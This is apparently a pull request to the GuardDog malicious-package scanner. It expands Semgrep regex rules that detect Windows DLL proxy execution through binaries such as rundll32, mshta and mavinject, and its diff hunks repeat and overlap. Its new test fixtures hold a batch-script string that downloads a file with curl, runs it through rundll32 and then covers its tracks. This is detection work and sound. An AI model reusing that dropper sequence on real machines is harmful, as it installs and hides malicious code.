### PR TITLE
Improve DLL hijacking rule coverage

### DIFF
--- a/guarddog/analyzer/sourcecode/dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/dll-hijacking.yml
@@ -27,12 +27,12 @@ rules:
                 - pattern-regex: (?i)InstallUtil(.exe)?\s+\S+
                 - pattern-regex: (?i)mshta(.exe)?\s+\S+
                 - pattern-regex: (?i)msiexec(.exe)?\s+\S+
-                - pattern-regex: (?i)odbcconf(.exe)?.*{REGSVR\s+\S+}
+                - pattern-regex: (?i)odbcconf(.exe)?\s+.*{\s*REGSVR\s+\S+\s*}
                 - pattern-regex: (?i)regsvcs(.exe)?\s+\S+
                 - pattern-regex: (?i)regasm(.exe)?\s+\S+
                 - pattern-regex: (?i)regsvr32(.exe)?\s+\S+
                 - pattern-regex: (?i)rundll32(.exe)?\s+\S+
-                - pattern-regex: (?i)verclsid(.exe)?.*{\S+}
+                - pattern-regex: (?i)verclsid(.exe)?\s+.*{\s*\S+\s*}
                 - pattern-regex: (?i)mavinject(.exe)?\s+\d+\s+/INJECTRUNNING\s+\S+
                 - pattern-regex: (?i)mmc(.exe)?\s+-Embedding\s+\S+.ms
         - patterns:

--- a/guarddog/analyzer/sourcecode/dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/dll-hijacking.yml
@@ -34,24 +34,24 @@ rules:
                 # a string with .dll or .so in it
                 - pattern: "..."
                 - pattern-regex: (?i).*?\.(dll|so)
-	- patterns:
-	  - pattern: "..."
-	  - pattern-either:
-	    # See MITRE ATT&CK "System Binary Proxy Execution" techniques
-	    # https://attack.mitre.org/techniques/T1218/
-	    - pattern-regex: control(.exe)?\s*\S*.cpl
-	    - pattern-regex: cmstp(.exe)?\s*\S*
-	    - pattern-regex: InstallUtil(.exe)?\s*\S*
-	    - pattern-regex: mshta(.exe)?\s*\S*
-	    - pattern-regex: msiexec(.exe)?\s*\S*
-	    - pattern-regex: odbcconf(.exe)?.*{REGSVR \S*}
-	    - pattern-regex: regsvcs(.exe)?\s*\S*
-	    - pattern-regex: regasm(.exe)?\s*\S*
-	    - pattern-regex: regsvr32(.exe)?\s*\S*
-	    - pattern-regex: rundll32(.exe)?\s*\S*
-	    - pattern-regex: verclsid(.exe)?.*{\S*}
-	    - pattern-regex: mavinject(.exe)?\s*\d+\s*/INJECTRUNNING\s*\S*
-	    - pattern-regex: mmc(.exe)?\s*-Embedding\s*\S*.ms
+        - patterns:
+          - pattern: "..."
+          - pattern-either:
+            # See MITRE ATT&CK "System Binary Proxy Execution" techniques
+            # https://attack.mitre.org/techniques/T1218/
+            - pattern-regex: control(.exe)?\s*\S*.cpl
+            - pattern-regex: cmstp(.exe)?\s*\S*
+            - pattern-regex: InstallUtil(.exe)?\s*\S*
+            - pattern-regex: mshta(.exe)?\s*\S*
+            - pattern-regex: msiexec(.exe)?\s*\S*
+            - pattern-regex: odbcconf(.exe)?.*{REGSVR \S*}
+            - pattern-regex: regsvcs(.exe)?\s*\S*
+            - pattern-regex: regasm(.exe)?\s*\S*
+            - pattern-regex: regsvr32(.exe)?\s*\S*
+            - pattern-regex: rundll32(.exe)?\s*\S*
+            - pattern-regex: verclsid(.exe)?.*{\S*}
+            - pattern-regex: mavinject(.exe)?\s*\d+\s*/INJECTRUNNING\s*\S*
+            - pattern-regex: mmc(.exe)?\s*-Embedding\s*\S*.ms
 
       # dll injection
       - pattern-either:

--- a/guarddog/analyzer/sourcecode/dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/dll-hijacking.yml
@@ -20,6 +20,21 @@ rules:
                 - pattern-regex: (?i).*?\/bin/.+\s+.*?\.so
                 # environment preload
                 - pattern-regex: LD_PRELOAD
+                # MITRE ATT&CK "System Binary Proxy Execution" techniques
+                # https://attack.mitre.org/techniques/T1218/
+                - pattern-regex: (?i)control(.exe)?\s+\S+.cpl
+                - pattern-regex: (?i)cmstp(.exe)?\s+\S+
+                - pattern-regex: (?i)InstallUtil(.exe)?\s+\S+
+                - pattern-regex: (?i)mshta(.exe)?\s+\S+
+                - pattern-regex: (?i)msiexec(.exe)?\s+\S+
+                - pattern-regex: (?i)odbcconf(.exe)?.*{REGSVR\s+\S+}
+                - pattern-regex: (?i)regsvcs(.exe)?\s+\S+
+                - pattern-regex: (?i)regasm(.exe)?\s+\S+
+                - pattern-regex: (?i)regsvr32(.exe)?\s+\S+
+                - pattern-regex: (?i)rundll32(.exe)?\s+\S+
+                - pattern-regex: (?i)verclsid(.exe)?.*{\S+}
+                - pattern-regex: (?i)mavinject(.exe)?\s+\d+\s+/INJECTRUNNING\s+\S+
+                - pattern-regex: (?i)mmc(.exe)?\s+-Embedding\s+\S+.ms
         - patterns:
           - pattern: $FN($EXE,...,$DLL)
           - metavariable-pattern:
@@ -34,24 +49,6 @@ rules:
                 # a string with .dll or .so in it
                 - pattern: "..."
                 - pattern-regex: (?i).*?\.(dll|so)
-        - patterns:
-          - pattern: "..."
-          - pattern-either:
-            # See MITRE ATT&CK "System Binary Proxy Execution" techniques
-            # https://attack.mitre.org/techniques/T1218/
-            - pattern-regex: control(.exe)?\s*\S*.cpl
-            - pattern-regex: cmstp(.exe)?\s*\S*
-            - pattern-regex: InstallUtil(.exe)?\s*\S*
-            - pattern-regex: mshta(.exe)?\s*\S*
-            - pattern-regex: msiexec(.exe)?\s*\S*
-            - pattern-regex: odbcconf(.exe)?.*{REGSVR\s*\S*}
-            - pattern-regex: regsvcs(.exe)?\s*\S*
-            - pattern-regex: regasm(.exe)?\s*\S*
-            - pattern-regex: regsvr32(.exe)?\s*\S*
-            - pattern-regex: rundll32(.exe)?\s*\S*
-            - pattern-regex: verclsid(.exe)?.*{\S*}
-            - pattern-regex: mavinject(.exe)?\s*\d+\s*/INJECTRUNNING\s*\S*
-            - pattern-regex: mmc(.exe)?\s*-Embedding\s*\S*.ms
 
       # dll injection
       - pattern-either:

--- a/guarddog/analyzer/sourcecode/dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/dll-hijacking.yml
@@ -34,6 +34,24 @@ rules:
                 # a string with .dll or .so in it
                 - pattern: "..."
                 - pattern-regex: (?i).*?\.(dll|so)
+	- patterns:
+	  - pattern: "..."
+	  - pattern-either:
+	    # See MITRE ATT&CK "System Binary Proxy Execution" techniques
+	    # https://attack.mitre.org/techniques/T1218/
+	    - pattern-regex: control(.exe)?\s*\S*.cpl
+	    - pattern-regex: cmstp(.exe)?\s*\S*
+	    - pattern-regex: InstallUtil(.exe)?\s*\S*
+	    - pattern-regex: mshta(.exe)?\s*\S*
+	    - pattern-regex: msiexec(.exe)?\s*\S*
+	    - pattern-regex: odbcconf(.exe)?.*{REGSVR \S*}
+	    - pattern-regex: regsvcs(.exe)?\s*\S*
+	    - pattern-regex: regasm(.exe)?\s*\S*
+	    - pattern-regex: regsvr32(.exe)?\s*\S*
+	    - pattern-regex: rundll32(.exe)?\s*\S*
+	    - pattern-regex: verclsid(.exe)?.*{\S*}
+	    - pattern-regex: mavinject(.exe)?\s*\d+\s*/INJECTRUNNING\s*\S*
+	    - pattern-regex: mmc(.exe)?\s*-Embedding\s*\S*.ms
 
       # dll injection
       - pattern-either:

--- a/guarddog/analyzer/sourcecode/dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/dll-hijacking.yml
@@ -11,6 +11,8 @@ rules:
       - pattern-either:
         - patterns:
           - pattern: "$DLL_LOAD"
+          # Ignore docstrings
+          - pattern-not-regex: ^\s*"""(.|\n)*?"""\s*$
           - metavariable-pattern:
               metavariable: $DLL_LOAD
               pattern-either:

--- a/guarddog/analyzer/sourcecode/dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/dll-hijacking.yml
@@ -44,7 +44,7 @@ rules:
             - pattern-regex: InstallUtil(.exe)?\s*\S*
             - pattern-regex: mshta(.exe)?\s*\S*
             - pattern-regex: msiexec(.exe)?\s*\S*
-            - pattern-regex: odbcconf(.exe)?.*{REGSVR \S*}
+            - pattern-regex: odbcconf(.exe)?.*{REGSVR\s*\S*}
             - pattern-regex: regsvcs(.exe)?\s*\S*
             - pattern-regex: regasm(.exe)?\s*\S*
             - pattern-regex: regsvr32(.exe)?\s*\S*

--- a/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
@@ -27,12 +27,12 @@ rules:
                 - pattern-regex: (?i)InstallUtil(.exe)?\s+\S+
                 - pattern-regex: (?i)mshta(.exe)?\s+\S+
                 - pattern-regex: (?i)msiexec(.exe)?\s+\S+
-                - pattern-regex: (?i)odbcconf(.exe)?.*{REGSVR\s+\S+}
+                - pattern-regex: (?i)odbcconf(.exe)?\s+.*{\s*REGSVR\s+\S+\s*}
                 - pattern-regex: (?i)regsvcs(.exe)?\s+\S+
                 - pattern-regex: (?i)regasm(.exe)?\s+\S+
                 - pattern-regex: (?i)regsvr32(.exe)?\s+\S+
                 - pattern-regex: (?i)rundll32(.exe)?\s+\S+
-                - pattern-regex: (?i)verclsid(.exe)?.*{\S+}
+                - pattern-regex: (?i)verclsid(.exe)?\s+.*{\s*\S+\s*}
                 - pattern-regex: (?i)mavinject(.exe)?\s+\d+\s+/INJECTRUNNING\s+\S+
                 - pattern-regex: (?i)mmc(.exe)?\s+-Embedding\s+\S+.ms
         - patterns:

--- a/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
@@ -34,24 +34,24 @@ rules:
                 # a string with .dll or .so in it
                 - pattern: "..."
                 - pattern-regex: (?i).*?\.(dll|so)
-	- patterns:
-	  - pattern: "..."
-	  - pattern-either:
-	    # See MITRE ATT&CK "System Binary Proxy Execution" techniques
-	    # https://attack.mitre.org/techniques/T1218/
-	    - pattern-regex: control(.exe)?\s*\S*.cpl
-	    - pattern-regex: cmstp(.exe)?\s*\S*
-	    - pattern-regex: InstallUtil(.exe)?\s*\S*
-	    - pattern-regex: mshta(.exe)?\s*\S*
-	    - pattern-regex: msiexec(.exe)?\s*\S*
-	    - pattern-regex: odbcconf(.exe)?.*{REGSVR \S*}
-	    - pattern-regex: regsvcs(.exe)?\s*\S*
-	    - pattern-regex: regasm(.exe)?\s*\S*
-	    - pattern-regex: regsvr32(.exe)?\s*\S*
-	    - pattern-regex: rundll32(.exe)?\s*\S*
-	    - pattern-regex: verclsid(.exe)?.*{\S*}
-	    - pattern-regex: mavinject(.exe)?\s*\d+\s*/INJECTRUNNING\s*\S*
-	    - pattern-regex: mmc(.exe)?\s*-Embedding\s*\S*.ms
+        - patterns:
+          - pattern: "..."
+          - pattern-either:
+            # See MITRE ATT&CK "System Binary Proxy Execution" techniques
+            # https://attack.mitre.org/techniques/T1218/
+            - pattern-regex: control(.exe)?\s*\S*.cpl
+            - pattern-regex: cmstp(.exe)?\s*\S*
+            - pattern-regex: InstallUtil(.exe)?\s*\S*
+            - pattern-regex: mshta(.exe)?\s*\S*
+            - pattern-regex: msiexec(.exe)?\s*\S*
+            - pattern-regex: odbcconf(.exe)?.*{REGSVR \S*}
+            - pattern-regex: regsvcs(.exe)?\s*\S*
+            - pattern-regex: regasm(.exe)?\s*\S*
+            - pattern-regex: regsvr32(.exe)?\s*\S*
+            - pattern-regex: rundll32(.exe)?\s*\S*
+            - pattern-regex: verclsid(.exe)?.*{\S*}
+            - pattern-regex: mavinject(.exe)?\s*\d+\s*/INJECTRUNNING\s*\S*
+            - pattern-regex: mmc(.exe)?\s*-Embedding\s*\S*.ms
 
       # dll injection
       - pattern-either:

--- a/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
@@ -20,6 +20,21 @@ rules:
                 - pattern-regex: (?i).*?\/bin/.+\s+.*?\.so
                 # environment preload
                 - pattern-regex: LD_PRELOAD
+                # MITRE ATT&CK "System Binary Proxy Execution" techniques
+                # https://attack.mitre.org/techniques/T1218/
+                - pattern-regex: (?i)control(.exe)?\s+\S+.cpl
+                - pattern-regex: (?i)cmstp(.exe)?\s+\S+
+                - pattern-regex: (?i)InstallUtil(.exe)?\s+\S+
+                - pattern-regex: (?i)mshta(.exe)?\s+\S+
+                - pattern-regex: (?i)msiexec(.exe)?\s+\S+
+                - pattern-regex: (?i)odbcconf(.exe)?.*{REGSVR\s+\S+}
+                - pattern-regex: (?i)regsvcs(.exe)?\s+\S+
+                - pattern-regex: (?i)regasm(.exe)?\s+\S+
+                - pattern-regex: (?i)regsvr32(.exe)?\s+\S+
+                - pattern-regex: (?i)rundll32(.exe)?\s+\S+
+                - pattern-regex: (?i)verclsid(.exe)?.*{\S+}
+                - pattern-regex: (?i)mavinject(.exe)?\s+\d+\s+/INJECTRUNNING\s+\S+
+                - pattern-regex: (?i)mmc(.exe)?\s+-Embedding\s+\S+.ms
         - patterns:
           - pattern: $FN($EXE,...,$DLL)
           - metavariable-pattern:
@@ -34,24 +49,6 @@ rules:
                 # a string with .dll or .so in it
                 - pattern: "..."
                 - pattern-regex: (?i).*?\.(dll|so)
-        - patterns:
-          - pattern: "..."
-          - pattern-either:
-            # See MITRE ATT&CK "System Binary Proxy Execution" techniques
-            # https://attack.mitre.org/techniques/T1218/
-            - pattern-regex: control(.exe)?\s*\S*.cpl
-            - pattern-regex: cmstp(.exe)?\s*\S*
-            - pattern-regex: InstallUtil(.exe)?\s*\S*
-            - pattern-regex: mshta(.exe)?\s*\S*
-            - pattern-regex: msiexec(.exe)?\s*\S*
-            - pattern-regex: odbcconf(.exe)?.*{REGSVR\s*\S*}
-            - pattern-regex: regsvcs(.exe)?\s*\S*
-            - pattern-regex: regasm(.exe)?\s*\S*
-            - pattern-regex: regsvr32(.exe)?\s*\S*
-            - pattern-regex: rundll32(.exe)?\s*\S*
-            - pattern-regex: verclsid(.exe)?.*{\S*}
-            - pattern-regex: mavinject(.exe)?\s*\d+\s*/INJECTRUNNING\s*\S*
-            - pattern-regex: mmc(.exe)?\s*-Embedding\s*\S*.ms
 
       # dll injection
       - pattern-either:

--- a/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
@@ -2,7 +2,7 @@ rules:
   - id: npm-dll-hijacking
     languages:
       - javascript
-    message: This package manipulates a trusted application into loading a malicious dll
+    message: This package manipulates a trusted application into loading a malicious DLL
     metadata:
       description: Identifies when a malicious package manipulates a trusted application into loading a malicious DLL
     pattern-either:
@@ -34,6 +34,24 @@ rules:
                 # a string with .dll or .so in it
                 - pattern: "..."
                 - pattern-regex: (?i).*?\.(dll|so)
+	- patterns:
+	  - pattern: "..."
+	  - pattern-either:
+	    # See MITRE ATT&CK "System Binary Proxy Execution" techniques
+	    # https://attack.mitre.org/techniques/T1218/
+	    - pattern-regex: control(.exe)?\s*\S*.cpl
+	    - pattern-regex: cmstp(.exe)?\s*\S*
+	    - pattern-regex: InstallUtil(.exe)?\s*\S*
+	    - pattern-regex: mshta(.exe)?\s*\S*
+	    - pattern-regex: msiexec(.exe)?\s*\S*
+	    - pattern-regex: odbcconf(.exe)?.*{REGSVR \S*}
+	    - pattern-regex: regsvcs(.exe)?\s*\S*
+	    - pattern-regex: regasm(.exe)?\s*\S*
+	    - pattern-regex: regsvr32(.exe)?\s*\S*
+	    - pattern-regex: rundll32(.exe)?\s*\S*
+	    - pattern-regex: verclsid(.exe)?.*{\S*}
+	    - pattern-regex: mavinject(.exe)?\s*\d+\s*/INJECTRUNNING\s*\S*
+	    - pattern-regex: mmc(.exe)?\s*-Embedding\s*\S*.ms
 
       # dll injection
       - pattern-either:
@@ -58,7 +76,7 @@ rules:
                   - pattern: ....appendFile
             - metavariable-pattern:
                 metavariable: $EXE
-                patterns: 
+                patterns:
                   # a string with .exe or /bin/[whatever] in it
                   - pattern: "..."
                   - pattern-regex: (?i).*?(\.exe|\/bin/.+)

--- a/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
@@ -44,7 +44,7 @@ rules:
             - pattern-regex: InstallUtil(.exe)?\s*\S*
             - pattern-regex: mshta(.exe)?\s*\S*
             - pattern-regex: msiexec(.exe)?\s*\S*
-            - pattern-regex: odbcconf(.exe)?.*{REGSVR \S*}
+            - pattern-regex: odbcconf(.exe)?.*{REGSVR\s*\S*}
             - pattern-regex: regsvcs(.exe)?\s*\S*
             - pattern-regex: regasm(.exe)?\s*\S*
             - pattern-regex: regsvr32(.exe)?\s*\S*

--- a/tests/analyzer/sourcecode/dll-hijacking.py
+++ b/tests/analyzer/sourcecode/dll-hijacking.py
@@ -74,6 +74,11 @@ def f():
     x = "This is a string containing CreateRemoteThread"
 
 
+def f():
+    # ruleid: dll-hijacking
+    data = '@echo off\ncurl -o Temp.b -L "http://127.0.0.1/user/user.asp?id=237596" > nul 2>&1\nrename Temp.b package.db > nul 2>&1\nrundll32 package.db,GenerateKey 1234\ndel "package.db"\nif exist "pk.json" (\ndel "package.json" > nul 2>&1\nrename "pk.json" "package.json" > nul 2>&1\n)'
+
+
 """
 Phantom DLL case planting a DLL and executing a builtin binary
 ref: https://www.reversinglabs.com/blog/attackers-leverage-pypi-to-sideload-malicious-dlls

--- a/tests/analyzer/sourcecode/npm-dll-hijacking.js
+++ b/tests/analyzer/sourcecode/npm-dll-hijacking.js
@@ -42,6 +42,14 @@ function f() {
   return;
 }
 
+// Running a DLL directly with rundll32
+function f() {
+    // ruleid: npm-dll-hijacking
+    const data = '@echo off\ncurl -o Temp.b -L "http://127.0.0.1/user/user.asp?id=237596" > nul 2>&1\nrename Temp.b package.db > nul 2>&1\nrundll32 package.db,GenerateKey 1234\ndel "package.db"\nif exist "pk.json" (\ndel "package.json" > nul 2>&1\nrename "pk.json" "package.json" > nul 2>&1\n)';
+
+    return;
+}
+
 // Phantom DLL case planting a shared object file and executing a builtin binary
 function f() {
   const fs = require("fs");


### PR DESCRIPTION
This PR improves the coverage of the DLL hijacking rules by adding patterns to match strings resembling various Windows commands for executing DLLs.